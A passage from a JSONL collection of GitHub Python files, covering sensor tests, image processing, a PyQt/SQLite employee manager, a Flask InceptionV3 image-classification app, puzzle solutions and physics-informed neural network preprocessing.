requests.get(url1).json()\n try:\n url = data ['item']['url']\n except TypeError:\n url = 'empty'\n pass\n print (url1)\n# print (url)\n themeforest = url.find('http://themeforest.net/')\n if themeforest != -1:\n item_id = data ['item']['id']\n item_name = data ['item']['item']\n user = data ['item']['user']\n sales = data ['item']['sales']\n# rating = data ['item']['rating']\n rating_decimal = data ['item']['rating_decimal']\n cost = data ['item']['cost']\n uploaded_on = data ['item']['uploaded_on']\n last_update = data ['item']['last_update']\n category = data['item']['category']\n tags = data ['item']['tags']\n string = item_id+';'+item_name+';'+user+';'+url+';'+sales+';'+cost+';'+rating_decimal+';'+uploaded_on+';'+last_update+';'+category+';'+tags+'\\n'\n string_encode = string.encode('ascii','replace')\n# print(string_encode)\n string_decode = string_encode.decode('ascii','replace')\n save_to_file.write(string_decode)\n save_to_file.flush()\n os.fsync(save_to_file.fileno())\n #time.sleep(4)\n else:\n continue\n \nprint (item_no)\n\nsave_to_file.close()\n\n","repo_name":"manojps/envato-marketplace-stats-using-api","sub_path":"envato_item_api.py","file_name":"envato_item_api.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26522166901","text":"#filename: getip.py\n\nimport os\nimport sys\n\ndef get_ips():\n\n tmp=list()\n \n ipcsv_path=os.path.join(sys.path[0],'ip_10896_5w.csv')\n f=open(ipcsv_path,'r')\n for line in f.readlines():\n line=line.strip().split('.')\n line[0]=\".\".join(line[0:2])\n line[1]=256*int(line[2])+int(line[3])\n tmp.append(line[:2])\n tmp.sort()\n f.close\n \n return tmp\n\n#list=get_ips()\n#print list\n","repo_name":"maixiaohai/mydocuments","sub_path":"ip2region_test/getip.py","file_name":"getip.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40351317023","text":"import time\nimport board\nimport microcontroller\nimport busio\nimport adafruit_adxl37x\nimport adafruit_bmp3xx\nimport adafruit_lis331\nimport adafruit_ms8607\n\n# Initialize I2C bus\ni2c = busio.I2C(board.IO9, board.IO8)\n\n# Check for connected I2C devices\nwhile not i2c.try_lock():\n pass\ndevices = i2c.scan()\ni2c.unlock()\n\n# Test each I2C device\nfor device in devices:\n try:\n print()\n print(\"-------------------------------------------------------\")\n print(\"Testing device at address: \", hex(device))\n if device == 0x76:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 P/T sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x40:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 H sensor found!\")\n print(\"Humidity: \", sensor.relative_humidity)\n elif device == 0x77:\n sensor = adafruit_bmp3xx.BMP3XX_I2C(i2c, 0x77)\n print(\"BMP390 sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x1d:\n sensor = adafruit_adxl37x.ADXL375(i2c, 0x1d)\n print(\"ADXL375 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n elif device == 0x19:\n sensor = adafruit_lis331.LIS331HH(i2c, 0x19)\n print(\"LIS331 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n else:\n raise ValueError(\"Unknown device at address: \", hex(device))\n except ValueError as ve:\n print(ve)\n except Exception as e:\n print(\"Error testing device at address \", hex(device), \": \", e)\n\n time.sleep(0.5) # Pause between sensor tests\nprint()\nprint(\"-------------------------------------------------------\")\n","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/Board_Files/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18316962117","text":"# coding: utf-8\n# python3.5.3\n# edge_detecting.py\n\nimport cv2\n\nfrom skimage import data, segmentation\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"--content\", type=str)\nparser.add_argument('--output', type=str)\n# blurred staus >>> normal=< 7\nparser.add_argument('--blurred', type=int)\nargs = parser.parse_args()\n\nglobal image, minT, maxT\n\n# Callback function for minimum threshold trackbar.\ndef adjustMinT(v):\n global minT\n minT = v\n cannyEdge()\n\n# Callback function for maximum threshold trackbar.\ndef adjustMaxT(v):\n global maxT\n maxT = v\n cannyEdge()\n\n\n###################################\n# Main program begins here. \n###################################\n\n\n# load original image as grayscale\nimage = cv2.imread(filename=args.content, flags=cv2.IMREAD_GRAYSCALE)\n\n# set up display window with trackbars for minimum and maximum threshold\n# values\n# 추후에 미세값 조정하기 위한 부분으로 현재는 미완료부분임.\ncv2.namedWindow(winname = \"edges\", flags = cv2.WINDOW_NORMAL)\n\nminT = 30\nmaxT = 150\n\n# cv2.createTrackbar() does not support named parameters\ncv2.createTrackbar(\"minT\", \"edges\", minT, 255, adjustMinT)\ncv2.createTrackbar(\"maxT\", \"edges\", maxT, 255, adjustMaxT)\n\n# Smoothing without removing edges.\ngray_filtered = cv2.bilateralFilter(image, 7, 50, 50)\n\n# minT, maxT 값을 밖으로 빼내서 조정값으로 변경해야함. 추후\nedge = cv2.Canny(image=gray_filtered, threshold1=minT, threshold2=maxT)\n\n# subtract 방식이 색상 미세조정이 가능해서 더 성능이 좋아보여, bitwise 를 대기로 함.\n# edge = cv2.bitwise_not(edge)\nedge = cv2.subtract(250, edge)\n\ncv2.imwrite(args.output, edge)","repo_name":"mrsono0/mangoPaint","sub_path":"Effects/edge_detecting.py","file_name":"edge_detecting.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8433504073","text":"from odoo.tests import tagged\n\nfrom odoo.addons.payment_xendit.tests.common import XenditCommon\n\n\n@tagged('post_install', '-at_install')\nclass TestPaymentProvider(XenditCommon):\n def test_incompatible_with_unsupported_currencies(self):\n \"\"\" Test that Xendit providers are filtered out from compatible providers when the currency\n is not supported. \"\"\"\n compatible_providers = self.env['payment.provider']._get_compatible_providers(\n self.company_id, self.partner.id, self.amount, currency_id=self.env.ref('base.AFN').id\n )\n self.assertNotIn(self.xendit, compatible_providers)\n","repo_name":"Vauxoo/odoo","sub_path":"addons/payment_xendit/tests/test_payment_provider.py","file_name":"test_payment_provider.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"12164224651","text":"#Captura de todas las excepciones sin discriminar el tipo.\n\"\"\"\nRealizar la carga de dos números por teclado e imprimir la división del primero respecto al \nsegundo. Capturar cualquier tipo de excepción que se dispare.\n\"\"\"\n\ntry:\n numero1= int(input(\"Ingrese un numero \"))\n numero2= int(input(\"Ingrese un nuevo numero \"))\n division = numero1 / numero2\n print(\"La division de ambos numeros es \", division)\nexcept:\n print(\"Problemas con la entrada de valores o en la operacion\")","repo_name":"SaraEOlivera/Ejercicios-Python","sub_path":"Python Github/Biblioteca - POO/58. Manejo de excepciones.py","file_name":"58. Manejo de excepciones.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70115498450","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n \n if t == \"\": return \"\"\n\n countT, countS = {}, {}\n\n for char in t:\n countT[char] = 1 + countT.get(char,0)\n\n res, resLen = (-1,-1), float('inf')\n\n have, need = 0, len(countT)\n\n left = 0\n\n for right in range(len(s)):\n curr = s[right]\n countS[curr] = 1 + countS.get(curr,0)\n\n if curr in countT and countS[curr] == countT[curr]:\n have += 1\n \n while have == need:\n if resLen > (right - left + 1):\n res = (left,right)\n resLen = (right - left + 1)\n \n leftChar = s[left]\n countS[leftChar] -= 1\n\n if leftChar in countT and countS[leftChar] < countT[leftChar]:\n have -= 1\n \n left += 1\n left,right = res\n\n return s[left:right+1] if resLen != float('inf') else \"\"\n\n\n","repo_name":"karan-mudaliar/LeetCode","sub_path":"0076-minimum-window-substring/0076-minimum-window-substring.py","file_name":"0076-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18176428451","text":"# TODO: добавить поиск по имени/фамилии/логину/id добаить комбобокс и поле ввода\n\nimport sqlite3\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QTableWidgetItem, QHeaderView, QMessageBox\n\nimport modules.account\nimport modules.login\nimport modules.search\nimport modules.addDialog\nimport modules.changeDialog\nfrom templates.control_employees import Ui_Control\n\n\nclass Control(QWidget, Ui_Control):\n def __init__(self, login, passwd):\n super().__init__()\n self.setupUi(self)\n self.con = sqlite3.connect('management.db')\n\n self.account = modules.account.Account(login, passwd)\n cur = self.con.cursor()\n self.importance = cur.execute(f\"SELECT importance FROM positions \"\n f\"WHERE position = '{self.account.get_position()}'\").fetchone()[0]\n self.importances = [i[0] for i in cur.execute(\"SELECT importance FROM positions\").fetchall()]\n cur.close()\n\n self.fill_work_table()\n self.config()\n self.fill_filter_cb()\n\n self.newWorkerBtn.clicked.connect(self.add_employee)\n self.setWorkerBtn.clicked.connect(self.update_employee)\n self.deleteWorkerBtn.clicked.connect(self.delete_employee)\n self.filterEdit.textChanged.connect(self.fill_work_table_filter)\n\n def fill_work_table(self):\n sql = \"SELECT * FROM workers\"\n\n cur = self.con.cursor()\n data = cur.execute(sql).fetchall()\n headers = cur.description\n headers = [headers[i][0] for i in range(len(headers))]\n cur.close()\n\n if self.importance != max(self.importances):\n self.outputWorkers.setColumnCount(len(data[0]) - 2)\n else:\n self.outputWorkers.setColumnCount(len(data[0]))\n self.outputWorkers.setHorizontalHeaderLabels(headers)\n header = self.outputWorkers.horizontalHeader()\n header.setSectionResizeMode(0, QHeaderView.Stretch)\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-НАЧАЛО========================\"\"\"\n\n def fill_filter_cb(self):\n if self.importance == max(self.importances):\n self.filterBox.addItems(['Имя', \"Фамилия\", \"Логин\", \"ID\"])\n else:\n self.filterBox.addItems(['Имя', \"Фамилия\", \"ID\"])\n\n def fill_work_table_filter(self):\n if not self.filterEdit.text():\n self.fill_work_table()\n result = modules.search.search(self.filterBox.currentText(), self.filterEdit.text())\n if not result:\n return\n data = result[0]\n self.outputWorkers.clear()\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-КОНЕЦ========================\"\"\"\n\n \"\"\"=============НАСТРОЙКА НАЧАЛО============\"\"\"\n def config(self):\n if self.importance == 2:\n self.newWorkerBtn.setEnabled(False)\n self.setWorkerBtn.setEnabled(False)\n self.deleteWorkerBtn.setEnabled(False)\n elif self.importance == max(self.importances):\n import modules.positions\n\n self.tabs.addTab(modules.positions.Positions(), 'Должности')\n else:\n self.setWorkerBtn.setEnabled(False)\n \"\"\"=============НАСТРОЙКА КОНЕЦ============\"\"\"\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ НАЧАЛО============\"\"\"\n\n def add_employee(self):\n dlg = modules.addDialog.AddDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def update_employee(self):\n dlg = modules.changeDialog.ChangeDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def delete_employee(self):\n try:\n elem = self.outputWorkers.selectedItems()[0]\n idd = self.outputWorkers.item(elem.row(), 0).text()\n except IndexError:\n return\n\n cur = self.con.cursor()\n login = cur.execute(f\"SELECT login FROM workers WHERE id = {idd}\").fetchone()[0]\n cur.close()\n\n if login == self.account.get_login():\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить самого себя!')\n return\n\n cur = self.con.cursor()\n elem_importance = cur.execute(\n f\"SELECT importance FROM positions WHERE position = '{self.outputWorkers.item(elem.row(), 6).text()}'\").fetchone()[\n 0]\n cur.close()\n if self.importance < elem_importance:\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить сотрудника, превосходящего вас по должности!')\n return\n\n valid = QMessageBox.question(self, 'Удаление', f\"Действительно удалить сотрудника с id {str(idd)}?\",\n QMessageBox.Yes, QMessageBox.No)\n\n if valid == QMessageBox.Yes:\n cur = self.con.cursor()\n cur.execute(f\"DELETE FROM workers WHERE id IN ({str(idd)})\")\n cur.close()\n self.con.commit()\n self.fill_work_table()\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ КОНЕЦ============\"\"\"\n\n\ndef exception_hook(cls, exception, traceback):\n sys.__excepthook__(cls, exception, traceback)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = modules.login.Login()\n ex.show()\n sys.excepthook = exception_hook\n sys.exit(app.exec_())\n","repo_name":"hatedestiny6/projectYandex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"28218507873","text":"import mahotas\n\nclass ZernikeMoments:\n \n def __init__(self, radius):\n # store the size of the radius that will be used when computing moments\n self.radius = radius\n\n def describe(self, image):\n # return the Zerinke moments for the image\n return mahotas.features.zernike_moments(image, self.radius)\n\n# indexing pokemon sprites\n\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nimport cv2\n\n# construct argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--sprites\", required = True,\n help = \"Path where the sprites will be stored\")\nap.add_argument(\"-i\", \"--index\", required = True,\n help = \"Path where the index file will be stored\")\nargs = vars(ap.parse_args())\n\n# intialize our descriptor (Zerinke Moments with a radius of 21\n# used to characterize the shape of our pokemon) and our index dictionary\ndesc = ZernikeMoments(21)\nindex = {}\n\n# loop over the sprite images\nfor spritePath in glob.glob(args[\"sprites\"] + \"/*.png\"):\n \n # parse ot the pokemon name, then load the image and convert to grayscale\n pokemon = spritePath[spritePath.rfind(\"/\") + 1:].replace(\".png\", \"\")\n image = cv2.imread(spritePath)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # pad the image with extra white pixels to ensure the edges of the \n # pokemon are not up against the borders of the image\n image = cv2.copyMakeBorder(image, 15,15,15,15, cv2.BORDER_CONSTANT, value = 255)\n\n # invert + threshold image\n # the inversion takes place so the foreground is white\n thresh = cv2.bitwise_not(image)\n thresh[thresh > 0] = 255\n\n # intialize the outline image, find the outermost\n # contours (outline) of the pokemon, the draw it\n outline = np.zeros(image.shape, dtype = \"uint8\")\n (_, cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[0]\n cv2.drawContours(outline, [cnts],-1,255,-1)\n\n # compute Zernike moments to characterize the shape of pokemon outline\n # the update index\n moments = desc.describe(outline)\n index[pokemon] = moments\n\n# write index to file\nwith open(args[\"index\"], 'wb') as f:\n pickle.dump(index, f)\n\n","repo_name":"AdamBioprinter/OpenCV-Python-Tutorials","sub_path":"opencv/pyimagesearchTuts/Pokedex2.py","file_name":"Pokedex2.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19243559522","text":"from my_city.views import CityNewsViewSet\nfrom rest_framework.routers import SimpleRouter\n\n\nclass OptionalSlashRouter(SimpleRouter):\n\n def __init__(self):\n self.trailing_slash = '/?'\n super(SimpleRouter, self).__init__()\n\n\nrouter = OptionalSlashRouter()\nrouter.register(r'my_city', CityNewsViewSet)\nurlpatterns = router.urls\n","repo_name":"AltynbekPirman/soAktau","sub_path":"backend/src/my_city/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29513116031","text":"# square and multiply modular expoentiation\nfrom traditional_extended_eudlidean import polynomial\nP = polynomial()\n\n\n# suppose p is the characteristic of the field F_p\ndef square_and_multiply(f, g, m, p):\n [_, temp] = P.div(f, g, p)\n result = [1]\n while m != 0:\n m, flag = m / 2, m % 2\n if flag == 1:\n [_, result] = P.div(P.mul(temp, result, p), g, p)\n [_, temp] = P.div(P.mul(temp, temp, p), g, p)\n return result\n","repo_name":"JenTus/AdvancedAlgorithm","sub_path":"square_and_multiply.py","file_name":"square_and_multiply.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42739851486","text":"\"\"\"Permet de visualiser et d'exploiter\r\nles données générées avec le processus\r\nmarkovien par le code stats_from_markov\"\"\"\r\n# from Code.V2.general import *\r\nfrom general import *\r\nimport numpy as np\r\nfrom pickle import Pickler, Unpickler\r\n\r\n\r\ndef stats_from_markov(\r\n nb_line: int = 1,\r\n nb_column: int = 1,\r\n sample: int = 1_000)\\\r\n -> tuple:\r\n \"\"\"Génère des tas de sable stable aléatoirement.\r\n Revoie la liste de fréquences des tas récurents et non récurents\"\"\"\r\n min_array = None\r\n min_weight = nb_line * nb_column * 3\r\n weight_recurrent = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n collapse_weight = np.zeros(nb_line * nb_column * 18, dtype=np.int64)\r\n loosed_weight = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n\r\n tas = neutral(nb_line, nb_column)\r\n weight = tas.sum()\r\n old_weight = weight\r\n adding_location = 0, 0\r\n for _ in range(sample):\r\n while tas.max() <= 3:\r\n old_weight += 1\r\n adding_location = np.random.randint(0, nb_line), np.random.randint(0, nb_column)\r\n tas[adding_location] += 1\r\n\r\n this_collapse_weight = collapse_large(tas, adding_location[0], adding_location[1]) // 4\r\n\r\n weight = tas.sum()\r\n this_loosed_weight = old_weight - weight\r\n old_weight = weight\r\n\r\n # configuration\r\n weight_recurrent[weight] += 1\r\n if weight < min_weight:\r\n min_weight = weight\r\n min_array = np.copy(tas)\r\n\r\n # collapse weight\r\n if this_collapse_weight > nb_line * nb_column * 18:\r\n raise IndexError(f\"{this_collapse_weight} est l'avalanche de trop\")\r\n else:\r\n collapse_weight[this_collapse_weight] += 1\r\n\r\n # loosed weight\r\n loosed_weight[this_loosed_weight] += 1\r\n\r\n return nb_line, nb_column, sample, weight_recurrent, min_array, collapse_weight, loosed_weight\r\n\r\n\r\ndef save_stats(nb_line, nb_column, sample):\r\n \"\"\"Save the stats\"\"\"\r\n with open(f\"Data\\Markov\\\\markov_{nb_line}_{nb_column}_{sample}\", 'wb') as file:\r\n pic = Pickler(file)\r\n pic.dump(stats_from_markov(nb_line, nb_column, sample))\r\n\r\n\r\nif __name__ == '__main__':\r\n from time import perf_counter as perf\r\n t = perf()\r\n save_stats(70, 70, 10_000_000)\r\n print(perf() - t)\r\n","repo_name":"TheoRudkiewicz/TIPE-Modele-du-tas-de-sable-abelien","sub_path":"Rectangle/Statistiques/stats_from_markov.py","file_name":"stats_from_markov.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"12065840661","text":"from flask import Flask, request, redirect, url_for, flash\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.inception_v3 import *\nfrom tensorflow.keras import backend as K\nfrom werkzeug.utils import secure_filename\n\nimport json\nimport numpy as np\nimport os\n\nUPLOAD_FOLDER = './image_sets/'\nif not os.path.exists(UPLOAD_FOLDER):\n os.mkdir(UPLOAD_FOLDER)\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef InceptV3(img):\n # Load InceptionV3 Image\n model = InceptionV3(include_top=True, weights='imagenet')\n # Resize the image\n img = image.load_img(img, target_size=(299, 299))\n # Change the image to array\n x = image.img_to_array(img)\n # Add dimension to image\n x = np.expand_dims(x, axis=0)\n # Normalize the data between 0 to 1\n x = preprocess_input(x)\n # Get prediciton\n preds = model.predict(x)\n result = dict((key, str(value)) for (_,key, value) in decode_predictions(preds)[0])\n K.clear_session()\n return json.dumps(result)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n global model\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n img = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n predict_results = InceptV3(img)\n return predict_results\n return '''\n \n Upload new File\n

    Upload new File

    \n
    \n

    \n \n \n

    \n '''\n\n@app.route('/train',methods = ['GET','POST'])\ndef training():\n if request.method == \"POST\":\n\n return \"This is inceptionV3 return\"\n return '''\n \n Training\n

    Training Custom data

    \n
    \n Bucket Name:
    \n
    \n Bucket Access Key:
    \n
    \n Bucket Secret Key:
    \n
    \n Epoch:
    \n
    \n Batch:
    \n
    \n Learning Rate:
    \n
    \n Decay:
    \n
    \n Momentum:
    \n
    \n \n
    \n '''\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=5001,debug=True,threaded=False)\n","repo_name":"twcc/AI-Services","sub_path":"Tutorial_Three/inceptionv3/inference/flask_web.py","file_name":"flask_web.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"66"} +{"seq_id":"7085289520","text":"import argparse\n\ndef get_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input')\n parser.add_argument('--mapping')\n parser.add_argument('--output')\n args = parser.parse_args()\n\n return args\n\ndef main(args):\n\n mapping = {}\n for line in open(args.mapping):\n src, tgt = line.strip().split()\n mapping[src] = tgt\n \n with open(args.output, 'w') as f:\n for line in open(args.input):\n s = ' '.join([mapping[w] for w in line.strip().split()])\n print(s, file=f)\n \nif __name__ == '__main__':\n\n args = get_args()\n main(args)","repo_name":"bearhsiang/SSLST","sub_path":"utils_new/map_hidden_unit.py","file_name":"map_hidden_unit.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"72258628371","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport re\n\n\nclass Machine:\n def __init__(self, instructions):\n self.instructions = instructions\n self.mask = 'X'\n self.memory = {}\n\n\n def apply_mask(self, value):\n mask = int(self.mask.replace('0', '1').replace('X', '0'), 2)\n overwrite = int(self.mask.replace('X', '0'), 2)\n return (overwrite & mask) | (value & (~mask))\n\n def run(self):\n for instruction in self.instructions:\n m = re.match(r\"mask = ([01X]+)\", instruction)\n if m:\n self.mask = m.group(1)\n continue\n m = re.match(r\"mem\\[(\\d+)\\] = (\\d+)\", instruction)\n if m:\n address = int(m.group(1))\n value = int(m.group(2))\n value_set = self.apply_mask(value)\n self.memory[address] = value_set\n\n\n\ndef main():\n with open(\"input\") as f:\n s = f.read()\n\n machine = Machine(s.splitlines())\n machine.run()\n result = sum(machine.memory.values())\n print(f\"Part 1: {result}\")\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fparat/adventofcode","sub_path":"2020/day14/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11373114483","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pickle import dump\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom torch import from_numpy\nfrom cfdpinn.plots import create_animation\n\ndef preprocess(data,geom,args):\n \"\"\"\n Returns a dict holding the NumPy arrays needed for PINN training\n \"\"\"\n #Merge features x,y,t into single array in data\n data = merge_features(data,geom)\n\n #Seperate into boundary and interior arrays\n data = extract_boundaries(data)\n data = extract_interior(data)\n\n #Obtain feature scaling object\n #Note that scaling is not applied until after training \n #locations are obtained as this requires using \n #pre-scaled spatio-temporal locations\n data[\"scaler\"] = scaling_object(data)\n if args.save_scaler_path != \"\":\n dump(data[\"scaler\"], open(args.save_scaler_path, \"wb\"))\n\n #Create training locations\n data = get_training_locations(data,args)\n\n #Train-test-splitting\n data = apply_scaling(data)\n data = apply_train_test_split(data,args.test_size,scaled=True)\n\n #Make boundary arrays contiguous for PyTorch\n data = make_boundary_arrays_contiguous(data)\n\n return data\n\ndef scaling_object(data):\n \"\"\"\n Fit a standard scaler to the training data\n features and return it.\n \"\"\"\n _scaler = StandardScaler()\n scaler = _scaler.fit(data[\"features\"])\n \n return scaler\n\ndef apply_scaling(data):\n \"\"\"\n Apply the data scaler to all training locations\n to be used in PINN training\n \"\"\"\n data_labels = [\"basewall\",\"interior\",\"leftwall\",\"rightwall\"]\n for data_label in data_labels:\n data[f\"scaled_features_{data_label}\"] = \\\n data[\"scaler\"].transform(data[f\"features_{data_label}\"])\n \n return data\n\ndef get_training_locations(data,args):\n \"\"\"\n Store the index of training locations chosen\n by train test split. This allows plotting for\n future visualization.\n \"\"\"\n #First need to apply train_test_splitting to \n #replicate real train_test_split\n data = apply_train_test_split(data,args.test_size,scaled=False)\n\n #Now extract locations for all components of\n #training data arrays\n array_labels = [\"interior\",\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n data[f\"{array_label}_training_locs\"] = np.concatenate(\n (\n data[f\"t_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"y_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"x_{array_label}_train\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n data[f\"{array_label}_training_locs\"] = \\\n data[f\"{array_label}_training_locs\"][data[f\"{array_label}_training_locs\"][:,0].argsort()]\n\n return data\n\ndef apply_train_test_split(data,test_size,scaled):\n \"\"\"\n Apply train-test splitting for all training data\n arrays.\n \"\"\"\n if scaled == True:\n label = \"scaled_\"\n elif scaled == False:\n label = \"\"\n\n #Interior\n (\n data[\"x_interior_train\"],\n data[\"x_interior_test\"],\n data[\"y_interior_train\"],\n data[\"y_interior_test\"],\n data[\"t_interior_train\"],\n data[\"t_interior_test\"],\n data[\"u_interior_train\"],\n data[\"u_interior_test\"],\n data[\"v_interior_train\"],\n data[\"v_interior_test\"],\n data[\"p_interior_train\"],\n data[\"p_interior_test\"],\n ) = train_test_split(\n data[f\"{label}features_interior\"][:,2], \n data[f\"{label}features_interior\"][:,1], \n data[f\"{label}features_interior\"][:,0],\n data[\"u_interior_labels\"],\n data[\"v_interior_labels\"],\n data[\"p_interior_labels\"],\n test_size=test_size)\n\n #Basewall\n (\n data[\"x_basewall_train\"],\n data[\"x_basewall_test\"],\n data[\"y_basewall_train\"],\n data[\"y_basewall_test\"],\n data[\"t_basewall_train\"],\n data[\"t_basewall_test\"],\n data[\"u_basewall_train\"],\n data[\"u_basewall_test\"],\n data[\"v_basewall_train\"],\n data[\"v_basewall_test\"],\n data[\"p_basewall_train\"],\n data[\"p_basewall_test\"],\n ) = train_test_split(\n data[f\"{label}features_basewall\"][:,2], \n data[f\"{label}features_basewall\"][:,1], \n data[f\"{label}features_basewall\"][:,0],\n data[\"u_basewall_labels\"],\n data[\"v_basewall_labels\"],\n data[\"p_basewall_labels\"],\n test_size=test_size)\n\n #Leftwall\n (\n data[\"x_leftwall_train\"],\n data[\"x_leftwall_test\"],\n data[\"y_leftwall_train\"],\n data[\"y_leftwall_test\"],\n data[\"t_leftwall_train\"],\n data[\"t_leftwall_test\"],\n data[\"u_leftwall_train\"],\n data[\"u_leftwall_test\"],\n data[\"v_leftwall_train\"],\n data[\"v_leftwall_test\"],\n data[\"p_leftwall_train\"],\n data[\"p_leftwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_leftwall\"][:,2], \n data[f\"{label}features_leftwall\"][:,1], \n data[f\"{label}features_leftwall\"][:,0],\n data[\"u_leftwall_labels\"],\n data[\"v_leftwall_labels\"],\n data[\"p_leftwall_labels\"],\n test_size=test_size)\n\n #Rightwall\n (\n data[\"x_rightwall_train\"],\n data[\"x_rightwall_test\"],\n data[\"y_rightwall_train\"],\n data[\"y_rightwall_test\"],\n data[\"t_rightwall_train\"],\n data[\"t_rightwall_test\"],\n data[\"u_rightwall_train\"],\n data[\"u_rightwall_test\"],\n data[\"v_rightwall_train\"],\n data[\"v_rightwall_test\"],\n data[\"p_rightwall_train\"],\n data[\"p_rightwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_rightwall\"][:,2], \n data[f\"{label}features_rightwall\"][:,1], \n data[f\"{label}features_rightwall\"][:,0],\n data[\"u_rightwall_labels\"],\n 